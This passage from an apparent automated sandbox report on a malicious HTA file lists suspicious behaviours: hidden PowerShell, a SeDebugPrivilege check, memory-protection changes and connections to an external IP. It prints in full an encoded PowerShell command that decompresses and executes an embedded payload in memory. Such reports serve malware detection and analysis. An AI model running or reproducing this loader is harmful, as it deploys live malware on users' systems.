BhAGcAUwA4AFoAawBxADAAagBKAGQAcgB2AGUAdgBkAG4AbQA5AFAATAB3AHgAVwBmAEUAVwBwADgAQQBaAEYANABkAGIAeQBrAHAAUQByADYAdABYAFIAYQB4AFIASgAvAHIAWgBUAGkAegBrAGoAZABxAEwAZQBYAGIAUABDAFQAdQBCAE4AZQBEAFoAdwAwAFAAcwBPAEYAYQBTAGgAbABwAEUAYQBaAEwATgBaAG8AOQBqAEEAUgA4AHUAUgBiAFgAUABkAEwATQA4AEUAegBPAEQAdwBnAGsATwBoADMAMwBIAEgAYwA4AHUAeABmADEAagArAE4AVABKAHQAdAAyAE8ARQA0AGwANwBCAGUAYQBTAHoAegBzAGgAWQBjAFEAOQBRAHcAcAAzAHUANQBEAHIAcgBkAHoAQgBXAGMAOQBKAFgAbAAzAGsAbgBjAFYATQA1AEQANAB2AGUASwA0AHIAVABCAEsAdQAzAEMAKwBJAGUANAByAGIAMABZAE0AUQB4AHAALwBFAFAAUgAwAE8AUQBhADcAZgBpAHcASQBxAGQANwBxAEkASABmAGIAUQBUAEwASgB6AEkAdQAwAGoAYQAzAFUAbwBSAHAATQBiAEgAZQAvAHcAawAwAEsAUgBKAG0AeQBrADYASQBFAGoATABUAG8AcQBOADEAUwBPAGQAdwBYADQAQgBIADcAcABoAEsARABoAEQAagB6ADYAdwBlADkATQBRADgATQBlAEoARAB1AGgAOQBCAGQAUgAwAHMANABPAGgAawBOAFIARwBCAFkANgBRAGQASgBpAG8AZQBRADIAbgB1AEsANwArAE8AZwBUADQALwBtAHgAMgBQAFYAQgBYAHUAawBDAEoAdwBlADkAawBMAFYAdQB6AHoAbgBZAE0AeQA2ADMAWgA0AHAAVQBDAEUAOABLAEQAegBaADIAMgBYAFQAVgBGAFIAUQBwAFAASgBBAGIAcwBSAGMAegB1AHUANABjAGQAZQBQAFEAMABUAHQAegBmADIALwBOADcARQBHAFEAVgAvAFoAMQA1ADUAQQA3AFoAdgBJADQATgBOAEkAbgBZAG0AeAB0AHUAMABVAFIAOQBIAFIAeABJAHgANABrAE8AMABvAG4AcwAyAEUAdgB0AGcAbwA2AGsAbAB5ADAAbwBKAFoAcABxAFgAYwBvAHoAVgBmAEQAQQBRAHQAagBOAGoAMwBnAHUAcQA0AFYARAB0AGoAMQBCAFkATQBaAGcAZAAyAEEAbABtAFgAdwB3AGIAcgBuAG4AagB4AEUAagBFAGQAVAA1AFcAZwBUAGwARwBRAFgAcwBlAGkASwB4AFgAagBVAGMAMABGADMAUAA1AFUASgBtAEcAZABZAFgANQA5ADQAYwB3ADIAUQBxAG8AeABHAEsAdQB5AHEAbwB4AHAANAA5AE0AaQBZADkAeQBOAEQANwBRAHgATgBlAHEAeQBPAHUANABUAGEAUAA2AHEAMgBNAHMAaQB5AFUATwBmADMAcwBiAG4AYQBPAHcAawB4AHAAaAA3AHAAegB2AGgAUgA3ADcAUABVAE0AYwA0AG4AZAAyAHYANwBhAFQAKwA0AGkAZQBjADMALwBXAFAAMwBKAGwAagBtAGEAKwBKAHoAWgAyAEIAcwB2AE0AegBlAGMAZgB5AEcAVgBsAHkAVgBwAFgAaQB6AFkAOAAvAEoAagBzAE4AUABPADcAYQBzAGQANQB4AEgASQB4AC8AUQBaAGsAYwBaADYAeAA1AEYAVAAvAEIASQBOAHQAVABEADQAagBTAC8AWABoAGgAZQBmADYAegA2AGkAZwBGADQAUwBOAFYAMwBSAGcAYQBMAHkAMQBQADgAZgBzAHgAegBJAG0ASgB6ADMARwBKAHkAVAA2AGEAMQB0AFMANgBzAFoAWQBVAHYAdQB0AEcAVABSADUARwBhAHIAOAB5AFkANwBZAEEAMgBUAEcAMgBxAGUAaAByAFAAcQB3AHAAdgBxAFAAZAAzAE4AagBuAGcAagBmAE4AZQB6AHUAMQBHAHQAagBuAG4ATgBKAC8AagBUAGMAMQBqAHcATgA3AE0AUABIAGcAeQB3ADEASwB5AGgAagA4AHAAKwBtAFEANABoAFQAVwBMAE0AUwBuAFoAVwBPAFgAWgBhAEQAbwBrAFYAWABaAHUAVABQAEwANwByAFcARwBXAGUAeQBKAEYAbwB6AHgARwA0AC8AeQBSAG0AZgBjAFoARABaADkAegBCAGoANgBjAGEAYQBEAFgAOABjAEYASAA5AGQANwBWADIATABrAHkATwBYAGoATQB3AGoAdgBNAGQAVwA4AHcAVgBsAGYANQBsAE4ARgBrAGgAaQBhADAAawBXAEUANgA4AG8AUQBqAG0AYwBYAE0AWgBqAGcAVgBWADMAbABTAEkAVQB3AHoARQBqAFMAdgBNADIATQBvAFYAVwBFAFAASwA4AGEAYwBtAEgATgAyAEwAUwBwAHMASABqAEwAZwB2ADYAaQB0AEYARQAvAHoASwBOAEcAZwB1ADUASAA0ADYAUwA1AGsAaABwAHcAZwB4AFkARgBpAGoAKwA2AGUASwBKAHEAWgBzAGEARgA2ADEARwBrAGgAMwBMAG0AOAAwAHAAdQBIAG4ANQBZAGIAYgBTADcAYgA5ACsAcAB5ADcAVQA2ADIARgBEAG0ATABrAEMAQwBNAHUAbQBqAGMARQBaAGoAcABMAEIAaABNAEIAdQBhAG4ASgA0AHYAeABOAHYAcgBnAGMAYgBxAGEAUQBTAHgANgAvAGcAYgBpACsAQQBnAHgATABjAEcAegBFAFEAbABOAFEAbAAwAG4AUAAwAEMATQBKAGMATwBkAEwATgBHAFEATAAvAHUAbwBzAEUAYwB4ADYANwBEAEoAaABvAFEAYwBzAFkAVwBKAEoAQwArAG0AdQA5AHcANQAzAGsAVwBaAE0AcgB1ADMAVgBwADYAWQAwAFoARABqAEMAeAA3AGQATQBOAEkAdQAvAFcAdwBUAHIAQwBZAHkAUABqAFUAegBPAFYAcwB4AEoAMAA4AGIAZgB0AG0AUgB2AE4AWABEAFEAMQBtADcAbABtAEUATQAzAGMAagB4AFcARgA3AHgALwA4AEwASwB3AGEAMgBmAFkAdQBmADYAQgBGAFUASgB5AGwAMAAxAGYAWABQAFQATABOAHUARQA4ADgASQB6AHoATAB4AFUAWABkADIANwAxADkAdgBGAEEAWgBRAFIAOQAyAFcAaABxADAAcgBoADMAbgBwAFgANABIADcAWABLAGMAbABXAG4ASwB3AHQASAB3AG8AZgBkAEQAdQBYAHUANABvAEwAWQArADcAYwBzADQAeABEAHQANQBSAG8ATgBEADUAdQBzAHoAMABVAEIAOABpAEgARgBoAFMAYQAxAEUAdQBGAEoAMwAwAC8AdABNAHMAdQA2AHoAZgB0AEQAdgBSADgAcAAwADcAcwBCAFcANAB5AEUANABiAEUAMwBZAGUAagBKAHYAYQAyAEUAVgBxAHIAawAwACsATABiAEwAbQBzAE8AcABHAHoAaAA1AGUARwA3AEwATAB4AHkANQBjADUAdQBOAGQANgBZADEAQgBDAHcAUwBwAGQAdAB6AEQAOABRAE8AQQA0AFgAdgA1ADMAOABXAGIAdAB6ADAAbQBoAHcANgBoAG8AbgBKAFcAMQB5AGkANwBzAEgAWQBvAGYAVgB2AHoASwBTAHYAUABNAGUANQB3AEYAVwAvAFIALwBwAFAANABuAGsALwArAGQAMQBKAEsAMgBxAG8AMQA3AEkANgAwAEMAOQBEAEYAVAB6AFYAcgA5AGEANgAwAG0ATAByAEYAMwA4ADQAbAA3AGgASQA4AFUAdABNAFAANgBWAGMAdwBsAHEAUgBXAG4AdAA1AHQAdwBBAFYAOAAwADEAUgBYAGQAdQBMAGEAYQBtAE0AagBPAHMARwBzAEwAKwA0ADcAZABnAG4AdABrAFEAdAB6AEIAWgAwADIAOAB5AHMAcgA3AEcAdgB2AHgAcABmAFkATgB5AHkAMwAzAEoAUAB3AE4AMAA1AEMATgBvAE4ATwArAEgAWQBZAEwAaQBGAEUARQByAFYAZQBwAHYAbABKADAARQBZAEQANQBmAHcARAA5AGwAcgBMAE4AQQBnADQAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 31, 2023, 12:32 p.m.	show_type: 0 filepath_r: powershell parameters: -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB5AEwAdwBiAGkANgB0ADEASwAxAHYASQBNAEMAawBUAGMAMQA1AHEAUgBTAEMASwBNAGkAQwBNAGkATABpAEcAZgAzAHYANQA4AEcATgBaAHUAOQBtADcAMQAzAHEAKwA2ADEAaQBuAEsAWQBtAGUANQArACsAcABuAHUAbgBrAFoASAA2AGEAMgBlAHgAcQA2AGQAeQBxAEcARABzAE4AcwBKAGkAaABNADMARABMAEMANwBXAHUAMQA2AGEAMwBuAEkAVABaAE0AUQBlADgAQwArADEAbQB2AEwATABMAEQAVABjAHEAawBjAHYASwA1AFEAKwBoAHIARgBvAGYAMQBxAE8AVQA2AE0AawBnAFQANwB1ADMAWQAxAHQAbQBKAHIAaQB6AFcAdQA5ADEAYgA4AHUAZwAyAGQAegBFAGMAdAByAEgAbwBwAE4AeQBJAG4AaQAxAEgAegA2AHEAcAAyAFYAVQAxAGwAUQBXAEkAdAAwAFcAdABnAHAAZQA0AGUAdgBXADUAUgB1AGcANgBkAEIAQQB3ADEAbgBzAGsAbwBZAHMASwB0ADUAUQBZAHYAWAA3ADcAUQBXAFIAeQBqAEkARAAyADkAdAAzAG0AVQBrAGsAbQBDAHQAZwB2AGYAUgBVAG0AagBpAFgAMwBEAHAAbQBzAFUAbwA5AHYASAB4AFEAYgBaAEsAZgBZADMAZAB2ADMAYQA1AHYAMQB3AFkAZgBuAG4AYgBRAFYAdAAyAFcAdAB3AGkAZwB5AGMAYwBrADAASwBiAGEAdgAwAG8ASwAxAEgAdgBwAHMAMgA2AG4ALwA5AFYAVwA4ACsAMwAzAFoAZQAyAHUAdwB1AHMALwB5AGsAVQBkAGUATABKAEUAWABiAHQAdQBQADcAOQBTAGIAMgB2AFYAawBhAE4ASQBvAEkATgBlAHEAeQBhADgAZABoAEUAaQA3AFQAOQB0AFEATgBpAEwAdQAyAFcAYQBGAFgASwB2AEQAeQBDAFgAdQA5AGUAZgBaAHMARgBWAG4AZwB4ACsAKwBkAEwATABXAGUAWgBCAHAAMQBHAEkANgBCAEcALwBMAEUAWQBiADIARgBQAFoAZgAyAG4AbAA5AGUAcwBLADkAdgBhAEwAUQBzAFMATgAwAHQAYQBvAHQAQgBpAHUASQB3ADAAbABHADgAZAAyADIAVQB0AEEAVQByAGMASAB5AGsAbwBTAFcASQAxAFIATQA0AHcAbQBCAFYAYgB3AEsASQBHAEsAVgBaAEgARwBBAFgATABDAEMAMwBEAHoAMwBVAHUAQQA0AHkAMwAyACsAQgAzAHUAYwAvADEAZgB2AFMAVQBGAEIAKwBJAGYAZABQAGgAUgByAHYAaABXAEQAWABPAEkAMgBiAHIAWABOAE0ALwBBAGsAZABjAGgAVQAzAEoAMwBYAGcAegBpAC8AbwAzAHcAVgBYAEUAMwA2AC8AQgBGAGkAegA5AHIAMwAyAFEAYQBnADYAeQBFAGMAcgBLADAAVwB2AEsAZgBEADcATABsAFoAcgBWADEAZgBQADEAUgBDAEIAUAA0ADEAeABtAEwAaQBWADMAQQBPAEcAdAB6AEEAWgBRAEYAaABwAEcAQgBmAGwAYwBSAHAAeABoAHAAbwB2AFAAOAA3AG4AWgBQAFkAaQBtAGIAUgArAHEANgBoAHoAawBUAHIATABuAEkANwBuAGgATwBNAEIAZQA1ADYARQByAHYATgBTAHUAMgByAFcAegB0AEYAVAB6AHIAOAB1AE0AdABkADMAVQBGAHkAdQAvAHoANABiAEcATABSADAAQQA4AFEAVQBnAGIAVgAxADcAVQB2AEEATgB6ADQANgBNADcAVAAwAFUAYwBWAEgAKwA3AEoATgBBAFoAeQBOACsAbgBrAEIATwBjAHkAWgBuAFgAcABKADYAUABPAHYAWQB1AHoAVwBUAGQAOQBrAHEAUgBNADQAMABvAFoAegBUAHcAQQBWAGgARQBUAHoAWgB6AEMAbgBNADIAegBVAHgAVQBCAEcAVwArAEQAdgA5AEEANQBoAGUAcgAyAEUATgBFAE8AWAAzAGUAZgBVAEsAaQA3AFcAeQAvAGMAeQBsAG0AbgBmAFMAcABJAFcATgBzADQAZwB6ACsAMABXAHAAaQBQAEwAUgAwADQATABJADQAUABFAFAAUwArAFIAVwBSAHAAVwB3AC8AbwBQAHUASABMAG0AcAA2ADUAdABKAGUAbABGADMAVQB2AHoAQQAwAHIAUABwAHUAawB3AGcASQB6AEoAYgBEAGgAZABvAE0ASABRAEkAMgBTADcAbABsACsAeQAwAHMASQBFADEAMABGAFUAbwBiAHUAcgBDADQAVAA2AGgANQB6AFEAbAB1ADkARAB5AG8ARwBtAFAAWgB3AEoAegBKAFIAYwA2AEcAawBaAE0ANwBIAFQAKwB2AGYANABhAEwAWgAxAGwASQByAGIAeQBFAGQAYgAyAEYAMQBWAEkAYwA2ADMAVgBsAEIAegB6AGgAbABWAGgAWgB1ADEAUQBrADcAOQBQADgAQwArADUATQBrAHAASwBVAHEAdQBMAGkAUwA5AEEAdwAwAEIAbwBQAHQAaAAyAHMASQBtAGIAcAB4AEMAWABhAHUAMwBmAGcAbQA4AC8AdwAzAGUAegB5AFgAbQBKADUAaAAwAGoATQA0AEgAMgBhAGcAUwA4AFoAawBxADAAagBKAGQAcgB2AGUAdgBkAG4AbQA5AFAATAB3AHgAVwBmAEUAVwBwADgAQQBaAEYANABkAGIAeQBrAHAAUQByADYAdABYAFIAYQB4AFIASgAvAHIAWgBUAGkAegBrAGoAZABxAEwAZQBYAGIAUABDAFQAdQBCAE4AZQBEAFoAdwAwAFAAcwBPAEYAYQBTAGgAbABwAEUAYQBaAEwATgBaAG8AOQBqAEEAUgA4AHUAUgBiAFgAUABkAEwATQA4AEUAegBPAEQAdwBnAGsATwBoADMAMwBIAEgAYwA4AHUAeABmADEAagArAE4AVABKAHQAdAAyAE8ARQA0AGwANwBCAGUAYQBTAHoAegBzAGgAWQBjAFEAOQBRAHcAcAAzAHUANQBEAHIAcgBkAHoAQgBXAGMAOQBKAFgAbAAzAGsAbgBjAFYATQA1AEQANAB2AGUASwA0AHIAVABCAEsAdQAzAEMAKwBJAGUANAByAGIAMABZAE0AUQB4AHAALwBFAFAAUgAwAE8AUQBhADcAZgBpAHcASQBxAGQANwBxAEkASABmAGIAUQBUAEwASgB6AEkAdQAwAGoAYQAzAFUAbwBSAHAATQBiAEgAZQAvAHcAawAwAEsAUgBKAG0AeQBrADYASQBFAGoATABUAG8AcQBOADEAUwBPAGQAdwBYADQAQgBIADcAcABoAEsARABoAEQAagB6ADYAdwBlADkATQBRADgATQBlAEoARAB1AGgAOQBCAGQAUgAwAHMANABPAGgAawBOAFIARwBCAFkANgBRAGQASgBpAG8AZQBRADIAbgB1AEsANwArAE8AZwBUADQALwBtAHgAMgBQAFYAQgBYAHUAawBDAEoAdwBlADkAawBMAFYAdQB6AHoAbgBZAE0AeQA2ADMAWgA0AHAAVQBDAEUAOABLAEQAegBaADIAMgBYAFQAVgBGAFIAUQBwAFAASgBBAGIAcwBSAGMAegB1AHUANABjAGQAZQBQAFEAMABUAHQAegBmADIALwBOADcARQBHAFEAVgAvAFoAMQA1ADUAQQA3AFoAdgBJADQATgBOAEkAbgBZAG0AeAB0AHUAMABVAFIAOQBIAFIAeABJAHgANABrAE8AMABvAG4AcwAyAEUAdgB0AGcAbwA2AGsAbAB5ADAAbwBKAFoAcABxAFgAYwBvAHoAVgBmAEQAQQBRAHQAagBOAGoAMwBnAHUAcQA0AFYARAB0AGoAMQBCAFkATQBaAGcAZAAyAEEAbABtAFgAdwB3AGIAcgBuAG4AagB4AEUAagBFAGQAVAA1AFcAZwBUAGwARwBRAFgAcwBlAGkASwB4AFgAagBVAGMAMABGADMAUAA1AFUASgBtAEcAZABZAFgANQA5ADQAYwB3ADIAUQBxAG8AeABHAEsAdQB5AHEAbwB4AHAANAA5AE0AaQBZADkAeQBOAEQANwBRAHgATgBlAHEAeQBPAHUANABUAGEAUAA2AHEAMgBNAHMAaQB5AFUATwBmADMAcwBiAG4AYQBPAHcAawB4AHAAaAA3AHAAegB2AGgAUgA3ADcAUABVAE0AYwA0AG4AZAAyAHYANwBhAFQAKwA0AGkAZQBjADMALwBXAFAAMwBKAGwAagBtAGEAKwBKAHoAWgAyAEIAcwB2AE0AegBlAGMAZgB5AEcAVgBsAHkAVgBwAFgAaQB6AFkAOAAvAEoAagBzAE4AUABPADcAYQBzAGQANQB4AEgASQB4AC8AUQBaAGsAYwBaADYAeAA1AEYAVAAvAEIASQBOAHQAVABEADQAagBTAC8AWABoAGgAZQBmADYAegA2AGkAZwBGADQAUwBOAFYAMwBSAGcAYQBMAHkAMQBQADgAZgBzAHgAegBJAG0ASgB6ADMARwBKAHkAVAA2AGEAMQB0AFMANgBzAFoAWQBVAHYAdQB0AEcAVABSADUARwBhAHIAOAB5AFkANwBZAEEAMgBUAEcAMgBxAGUAaAByAFAAcQB3AHAAdgBxAFAAZAAzAE4AagBuAGcAagBmAE4AZQB6AHUAMQBHAHQAagBuAG4ATgBKAC8AagBUAGMAMQBqAHcATgA3AE0AUABIAGcAeQB3ADEASwB5AGgAagA4AHAAKwBtAFEANABoAFQAVwBMAE0AUwBuAFoAVwBPAFgAWgBhAEQAbwBrAFYAWABaAHUAVABQAEwANwByAFcARwBXAGUAeQBKAEYAbwB6AHgARwA0AC8AeQBSAG0AZgBjAFoARABaADkAegBCAGoANgBjAGEAYQBEAFgAOABjAEYASAA5AGQANwBWADIATABrAHkATwBYAGoATQB3AGoAdgBNAGQAVwA4AHcAVgBsAGYANQBsAE4ARgBrAGgAaQBhADAAawBXAEUANgA4AG8AUQBqAG0AYwBYAE0AWgBqAGcAVgBWADMAbABTAEkAVQB3AHoARQBqAFMAdgBNADIATQBvAFYAVwBFAFAASwA4AGEAYwBtAEgATgAyAEwAUwBwAHMASABqAEwAZwB2ADYAaQB0AEYARQAvAHoASwBOAEcAZwB1ADUASAA0ADYAUwA1AGsAaABwAHcAZwB4AFkARgBpAGoAKwA2AGUASwBKAHEAWgBzAGEARgA2ADEARwBrAGgAMwBMAG0AOAAwAHAAdQBIAG4ANQBZAGIAYgBTADcAYgA5ACsAcAB5ADcAVQA2ADIARgBEAG0ATABrAEMAQwBNAHUAbQBqAGMARQBaAGoAcABMAEIAaABNAEIAdQBhAG4ASgA0AHYAeABOAHYAcgBnAGMAYgBxAGEAUQBTAHgANgAvAGcAYgBpACsAQQBnAHgATABjAEcAegBFAFEAbABOAFEAbAAwAG4AUAAwAEMATQBKAGMATwBkAEwATgBHAFEATAAvAHUAbwBzAEUAYwB4ADYANwBEAEoAaABvAFEAYwBzAFkAVwBKAEoAQwArAG0AdQA5AHcANQAzAGsAVwBaAE0AcgB1ADMAVgBwADYAWQAwAFoARABqAEMAeAA3AGQATQBOAEkAdQAvAFcAdwBUAHIAQwBZAHkAUABqAFUAegBPAFYAcwB4AEoAMAA4AGIAZgB0AG0AUgB2AE4AWABEAFEAMQBtADcAbABtAEUATQAzAGMAagB4AFcARgA3AHgALwA4AEwASwB3AGEAMgBmAFkAdQBmADYAQgBGAFUASgB5AGwAMAAxAGYAWABQAFQATABOAHUARQA4ADgASQB6AHoATAB4AFUAWABkADIANwAxADkAdgBGAEEAWgBRAFIAOQAyAFcAaABxADAAcgBoADMAbgBwAFgANABIADcAWABLAGMAbABXAG4ASwB3AHQASAB3AG8AZgBkAEQAdQBYAHUANABvAEwAWQArADcAYwBzADQAeABEAHQANQBSAG8ATgBEADUAdQBzAHoAMABVAEIAOABpAEgARgBoAFMAYQAxAEUAdQBGAEoAMwAwAC8AdABNAHMAdQA2AHoAZgB0AEQAdgBSADgAcAAwADcAcwBCAFcANAB5AEUANABiAEUAMwBZAGUAagBKAHYAYQAyAEUAVgBxAHIAawAwACsATABiAEwAbQBzAE8AcABHAHoAaAA1AGUARwA3AEwATAB4AHkANQBjADUAdQBOAGQANgBZADEAQgBDAHcAUwBwAGQAdAB6AEQAOABRAE8AQQA0AFgAdgA1ADMAOABXAGIAdAB6ADAAbQBoAHcANgBoAG8AbgBKAFcAMQB5AGkANwBzAEgAWQBvAGYAVgB2AHoASwBTAHYAUABNAGUANQB3AEYAVwAvAFIALwBwAFAANABuAGsALwArAGQAMQBKAEsAMgBxAG8AMQA3AEkANgAwAEMAOQBEAEYAVAB6AFYAcgA5AGEANgAwAG0ATAByAEYAMwA4ADQAbAA3AGgASQA4AFUAdABNAFAANgBWAGMAdwBsAHEAUgBXAG4AdAA1AHQAdwBBAFYAOAAwADEAUgBYAGQAdQBMAGEAYQBtAE0AagBPAHMARwBzAEwAKwA0ADcAZABnAG4AdABrAFEAdAB6AEIAWgAwADIAOAB5AHMAcgA3AEcAdgB2AHgAcABmAFkATgB5AHkAMwAzAEoAUAB3AE4AMAA1AEMATgBvAE4ATwArAEgAWQBZAEwAaQBGAEUARQByAFYAZQBwAHYAbABKADAARQBZAEQANQBmAHcARAA5AGwAcgBMAE4AQQBnADQAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA= filepath: powershell	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 31, 2023, 12:33 p.m.	process_identifier: 1200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 31, 2023, 12:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Creates a suspicious Powershell process (4 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	192.168.56.103:49164
dead_host	194.169.175.143:8531

referent.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All